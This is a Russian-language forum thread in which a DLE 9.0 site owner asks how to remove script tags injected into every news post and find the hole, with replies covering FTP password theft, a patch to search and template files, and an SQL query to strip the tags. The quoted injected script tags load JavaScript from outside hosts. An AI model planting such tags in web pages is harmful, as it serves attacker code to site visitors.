• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Помощь Взломали сайт

Статус
В этой теме нельзя размещать новые ответы.

kail.2009

Постоялец
Регистрация
26 Сен 2009
Сообщения
94
Реакции
10
В каждой новости на сайте добавили вот такое вот:
Код:
<script src="http://zheenix.msk.ru/37d446615f683577de3c6036925749d5.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>
Как можно убрать все эти ссылки? Как найти дырку через которую это зделали ? Версия движка 9.0
 
Очень часто ломают через фтп (вирусы тягают сохраненные пароли с total commander и др). Если это так:
1. Проверить комп на вирусы.
2. Сменить пароль на фтп.
3. Заменить файлы на хосте из бекапа (если есть) или выкачать на комп и поиском по файлам найти/удалить строку.
Как правило поражает index.php, index.html, файлы шаблонов, js файлы, но модификация может быть любая.
 
www

Дырку вроди закрыл вот так:

Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
Код:
$count_result = 0;

ниже добавьте:
Код:
$sql_count = "";

Откройте файл engine/inc/templates.php и найдите:
Код:
$allow_save = false;

ниже добавьте:
Код:
    $_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
    $_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );

Помогите избавится от кодов в новостя, есть какой нибуть скрипт для массового удаления ?
 
  • Заблокирован
  • #4
Если везде код одинаковый который попал в новости то можно попробывать через SQL
Иначе только ручками
Хотя в админке DLE помоему есть инструмент поиск и замена посмотри можно и через него сделать
 
www

Код:
<script src="http://zheenix.msk.ru/37d446615f683577de3c6036925749d5.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>

В каждой новости разное вот это значение:
Код:
37d446615f683577de3c6036925749d5

Остольное не меняется
 
www

Убрал все ссылки без труда и за минут 5) Через phpMyAdmin спомощью этого скрипта:
Код:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="ссылка" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="ссылка" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="ссылка" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="ссылка" type="text/javascript"></script>%'
Подробное описание нашол здесь Для просмотра ссылки Войди или Зарегистрируйся
 
main.tpl там убери эту строчку и всё
 
1)Заменить пароль пользователя mysql
2)Проверить на наличие новых админов(при наличии удалить)
3)Изменить пасс к ftp
 
У меня такое было, когда вирус на компе пароли все сохраненные потырил.
Тоесть в тотал-коммандере пароль к фтп был сохранен. Вот через фтп всё заползло.
Что я сделал. Удалил НОД. Поставил касперский - удалил вирусы, поменял пароль на фтп, почистил скрипты, завел новую аську, никогда больше не сохраняю пароли в операх аськах и коммандере.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху